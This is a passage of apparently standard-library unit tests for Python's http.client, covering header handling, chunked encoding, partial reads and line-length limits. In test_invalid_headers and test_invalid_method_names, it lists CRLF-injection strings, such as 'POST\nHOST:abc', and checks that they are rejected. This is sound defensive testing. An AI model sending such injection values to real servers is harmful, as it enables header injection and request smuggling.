def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
def test_headers_debuglevel(self):
body = (
b'HTTP/1.1 200 OK\r\n'
b'First: val\r\n'
b'Second: val1\r\n'
b'Second: val2\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock, debuglevel=1)
with support.captured_stdout() as output:
resp.begin()
lines = output.getvalue().splitlines()
self.assertEqual(lines[0], "reply: 'HTTP/1.1 200 OK\\r\\n'")
self.assertEqual(lines[1], "header: First: val")
self.assertEqual(lines[2], "header: Second: val1")
self.assertEqual(lines[3], "header: Second: val2")
class HttpMethodTests(TestCase):
def test_invalid_method_names(self):
methods = (
'GET\r',
'POST\n',
'PUT\n\r',
'POST\nValue',
'POST\nHOST:abc',
'GET\nrHost:abc\n',
'POST\rRemainder:\r',
'GET\rHOST:\n',
'\nPUT'
)
for method in methods:
with self.assertRaisesRegex(
ValueError, "method can't contain control characters"):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.request(method=method, url="/")
class TransferEncodingTest(TestCase):
expected_body = b"It's just a flesh wound"
def test_endheaders_chunked(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.putrequest('POST', '/')
conn.endheaders(self._make_body(), encode_chunked=True)
_, _, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
def test_explicit_headers(self):
# explicit chunked
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
# this shouldn't actually be automatically chunk-encoded because the
# calling code has explicitly stated that it's taking care of it
conn.request(
'POST', '/', self._make_body(), {'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# explicit chunked, string body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self.expected_body.decode('latin-1'),
{'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# User-specified TE, but request() does the chunk encoding
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/',
headers={'Transfer-Encoding': 'gzip, chunked'},
encode_chunked=True,
body=self._make_body())
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(headers['Transfer-Encoding'], 'gzip, chunked')
self.assertEqual(self._parse_chunked(body), self.expected_body)
def test_request(self):
for empty_lines in (False, True,):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self._make_body(empty_lines=empty_lines))
_, headers, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
# Content-Length and Transfer-Encoding SHOULD not be sent in the
# same request
self.assertNotIn('content-length', [k.lower() for k in headers])
def test_empty_body(self):
# Zero-length iterable should be treated like any other iterable
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/', ())
_, headers, body = self._parse_request(conn.sock.data)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(body, b"0\r\n\r\n")
def _make_body(self, empty_lines=False):
lines = self.expected_body.split(b' ')
for idx, line in enumerate(lines):
# for testing handling empty lines
if empty_lines and idx % 2:
yield b''
if idx < len(lines) - 1:
yield line + b' '
else:
yield line
def _parse_request(self, data):
lines = data.split(b'\r\n')
request = lines[0]
headers = {}
n = 1
while n < len(lines) and len(lines[n]) > 0:
key, val = lines[n].split(b':')
key = key.decode('latin-1').strip()
headers[key] = val.decode('latin-1').strip()
n += 1
return request, headers, b'\r\n'.join(lines[n + 1:])
def _parse_chunked(self, data):
body = []
trailers = {}
n = 0
lines = data.split(b'\r\n')
# parse body
while True:
size, chunk = lines[n:n+2]
size = int(size, 16)
if size == 0:
n += 1
break
self.assertEqual(size, len(chunk))
body.append(chunk)
n += 2
# we /should/ hit the end chunk, but check against the size of
# lines so we're not stuck in an infinite loop should we get
# malformed data
if n > len(lines):
break
return b''.join(body)
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("''")''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile(io.TextIOBase):
mode = 'r'
d = data()
def read(self, blocksize=-1):
return next(self.d)
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_blocksize_request(self):
"""Check that request() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.request("PUT", "/", io.BytesIO(expected), {"Content-Length": "9"})
self.assertEqual(sock.sendall_calls, 3)
body = sock.data.split(b"\r\n\r\n", 1)[1]
self.assertEqual(body, expected)
def test_blocksize_send(self):
"""Check that send() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.send(io.BytesIO(expected))
self.assertEqual(sock.sendall_calls, 2)
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
        # Test HTTPResponse with no \r\n termination.
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
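        # A chunk-size line may carry extensions after a ';' (e.g. "3;foo=bar");
        # the parser must ignore them and still read the 3-byte chunk payload.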
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
